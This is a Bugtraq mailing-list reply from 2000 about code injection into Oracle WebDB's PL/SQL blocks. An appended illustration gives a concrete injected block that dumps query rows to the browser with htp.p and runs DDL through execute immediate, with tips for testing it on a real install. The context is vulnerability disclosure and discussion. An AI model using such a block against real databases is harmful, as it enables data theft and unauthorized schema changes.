[18278] in bugtraq
Re: Oracle WebDb engine brain-damagse
daemon@ATHENA.MIT.EDU (Kuznetsov, Vasily)
Thu Dec 21 13:55:18 2000
MIME-Version: 1.0
Content-Type: text/plain; charset="koi8-r"
Message-ID:  <3EC6A521B353D111B05A00A024D8DDA3011DAEB0@hermes.office>
Date:         Thu, 21 Dec 2000 11:43:39 +0500
Reply-To: VKuznetsov@MICROTEST.RU
From: "Kuznetsov, Vasily" <VKuznetsov@MICROTEST.RU>
To: BUGTRAQ@SECURITYFOCUS.COM
> -----Original Message-----
> From: McAllister, Andrew [mailto:McAllisterA@umsystem.edu]
> Sent: Thursday, December 21, 2000 3:47 AM
> To: BUGTRAQ@securityfocus.com
> Subject: Re: [BUGTRAQ] Oracle WebDb engine brain-damagse
...
>
> I'm not sure that a select would work as I believe that the
> query is running
> inside a PL/SQL prepared statement where output is not sent
> to stdout, i.e.
> the browser. In other words I believe your statement is
> translated into
> something like:
>
> begin
>    some_webdb_standard_stored_procedure_call;
>    select * from (tablename);
> end;
>
Looks the same to me.
> This is not to say that you can't issue some dangerous commands as you
> suggest, just that you won't see any data as a result. Also,
An attacker could probably use the standard WebDB means of output to
get the data to his browser. Something like

for i in (select ...) loop
	some_web_db_output_proc(...);
end loop;

would probably do the trick.
> I believe that
> only data manipulation commands will work in this context e.g. delete,
> update, insert. I don't believe definition commands will
> work, e.g. drop,
> create. Again I don't have WebDB, so I cannot verify.
DDL commands can probably be issued via execute immediate,
although I too don't have WebDB around to check.
Vasily Kuznetsov
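
As an added illustration (not part of the original message or of WebDB's own code), here is a PL/SQL block of the shape the thread sketches: an injected SELECT that is echoed row by row through an output procedure, followed by DDL run through execute immediate. It assumes the injected text lands inside an anonymous block that runs with the WebDB schema's privileges and that htp.p from the PL/SQL Web Toolkit is the "standard means of output"; htp.p, some_webdb_standard_stored_procedure_call, the view queried and the table name are assumptions made for illustration.

```sql
-- Added example, not from the original post. ASSUMPTIONS: the block executes
-- with WebDB's privileges, htp.p (PL/SQL Web Toolkit) writes to the HTTP
-- response, and some_webdb_standard_stored_procedure_call is a placeholder
-- for whatever WebDB puts at the top of the block.
begin
    some_webdb_standard_stored_procedure_call;

    -- 1. A bare SELECT inside PL/SQL sends nothing to the browser; iterating
    --    over it and pushing each row through the output procedure does.
    --    all_users is a standard Oracle data dictionary view, used here only
    --    as a harmless query that any session can run.
    for r in (select username, created from all_users) loop
        htp.p(r.username || ' ' || to_char(r.created, 'YYYY-MM-DD') || '<br>');
    end loop;

    -- 2. DDL cannot appear as a static statement in a PL/SQL block, but native
    --    dynamic SQL (execute immediate, Oracle 8i and later; DBMS_SQL on older
    --    releases) runs it with the same privileges as the block.
    execute immediate 'create table injected_marker (x number)';
    execute immediate 'drop table injected_marker';
end;
```

Two details worth noting when checking this against a real WebDB install: an unhandled error in the DDL part aborts the whole block, so the data-echoing loop is placed before it; and whether the DDL succeeds depends only on the privileges of the schema the block runs under, not on anything WebDB does with the statement text.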